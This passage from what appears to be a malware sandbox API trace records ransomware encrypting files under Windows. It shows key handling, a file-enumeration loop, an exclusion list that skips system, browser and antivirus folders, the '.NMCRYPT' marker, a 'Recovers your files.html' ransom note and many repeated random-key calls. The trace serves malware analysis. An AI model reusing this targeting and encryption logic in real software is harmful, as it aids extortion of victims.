shared\\ink\\.xXB36F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb36f.tmp")) returned 1 [0147.598] CryptDestroyKey (hKey=0x9ad138) returned 1 [0147.598] wcslen (_String="OK") returned 0x2 [0147.598] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.598] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.598] CryptDestroyKey (hKey=0x9ad338) returned 1 [0147.598] CryptDestroyHash (hHash=0x9ad238) returned 1 [0147.598] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0147.598] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.598] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*NMCRYPT") returned 0 [0147.598] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*Recovers your files.html") returned 0 [0147.598] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*.exe") returned 0 [0147.598] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*.dll") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*.lnk") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*.bat") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*.ini") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*.msi") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*.scf") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*pagefile.sys*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*AppData*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*\\winrar\\*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*\\java\\*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*\\windows\\*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*\\ESET\\*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*\\AVG\\*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*Atheros*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*Realtek*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*bootmgr*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*boot*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*boot*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*IO.SYS*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*ntldr*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*chrome*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*opera*") returned 0 [0147.599] PathMatchSpecW (pszFile="ipsita.xml", pszSpec="*firefox*") returned 0 [0147.599] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml", pszSpec="*") returned 1 [0147.599] strlen (_Str="NMoreira") returned 0x8 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.601] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.602] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.606] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | 